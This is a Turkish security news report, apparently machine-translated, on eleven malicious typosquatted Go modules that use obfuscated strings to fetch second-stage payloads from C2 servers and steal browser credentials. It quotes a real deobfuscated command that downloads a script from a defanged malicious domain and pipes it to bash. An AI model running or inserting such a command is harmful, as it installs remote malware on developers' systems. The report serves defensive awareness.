
Siber güvenlik araştırmacıları, ikinci aşama yükler sunmak için gelişmiş gizleme teknikleri kullanan on bir kötü amaçlı paketle Go ekosistemini hedefleyen gelişmiş bir kötü amaçlı yazılım kampanyası ortaya çıkardılar.
Kampanya, tedarik zinciri saldırılarında ilgili bir evrim göstererek, Linux Build sunucularını ve Windows iş istasyonlarını tehlikeye atabilecek kötü amaçlı kodlar dağıtmak için Go’nun modül sisteminin merkezi olmayan doğasından yararlanıyor.
Kötü niyetli paketler, gerçek işlevselliklerini statik analiz araçlarından gizleyen özdeş dizin tabanlı dize gizleme rutinlerini kullanır.
Çalışma zamanında, kod sessizce sistem mermilerini ortaya çıkarır ve değiştirilebilir .ICU ve .Tech alanlarında barındırılan komut ve kontrol sunucularından yürütülebilir yükleri alır.
En önemlisi, bu paketlerden on tanesinin Go modülü kayıt defterinde aktif kalması ve tehdit aktörlerine ithal eden herhangi bir geliştirme ortamına kalıcı erişim sağladığıdır.
.webp)
Socket.DEV analistleri, on bir paketin sekizinin, rutin bağımlılık aramaları yapan geliştiricilere güvenilir görünmesi için özenle hazırlanmış, meşru GO modüllerinin sofistike yazım hataları olduğunu belirledi.
Araştırmacılar, on kötü amaçlı URL’den altısının ulaşılabilir kaldığını ve yazılım geliştirme topluluğuna aktif ve devam eden bir tehdit olduğunu keşfettiler.
Saldırı vektörü, modüllerin NPM veya PYPI gibi merkezi kayıtlardan ziyade doğrudan GitHub depolarından aktarıldığı merkezi olmayan paket yönetim sisteminden yararlanır.
Bu, saldırganların farklı bakımcılarla benzer şekilde adlandırılmış modüller oluşturarak sömürdüğü ad alan karışıklığı yaratarak, geliştiricilerin meşru paketleri kötü niyetli sahtekarlardan ayırt etmelerini zorlaştırıyor.
Gizleme ve yük dağıtım mekanizması
Kötü amaçlı yazılım, tüm paketlerde tutarlı bir gizleme tekniği kullanır ve çalışma zamanında kötü niyetli komutları yeniden yapılandırmak için dizi güdümlü kod çözücüler kullanır.
Gizli kod, ipi dizileri oluşturan ve uzaktan yükleri indiren ve yürüten sistem komutlarını oluşturmak için farklı endeksleri çağıran öngörülebilir bir desen izler.
Örneğin, paket github.com/expertsandba/opt
Beobfuscated’de yürütülen gizlenmiş kod içerir: /bin/sh -c wget -O - https://monsoletter[.]icu/storage/de373d0df/a31546bf | /bin/bash &
.
.webp)
Bu komut, bir bash betiğini doğrudan belleğe indirir ve diske yazmadan arka planda yürütür ve gizli yük teslimatını etkinleştirir.
İkinci aşamalı yükler, sanal alan analiz sistemlerini atlatmak için bir saatlik bir uyku gecikmesi uygulayarak sofistike kaçırma tekniklerini gösterir.
Etkinleştirildikten sonra, kötü amaçlı yazılım sistem bilgilerini numaralandırır, tarayıcı kimlik bilgilerini hasat eder ve dış komuta ve kontrol altyapısına sürekli ağ işaretleme yoluyla kalıcı arka kapı erişimi oluşturur.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın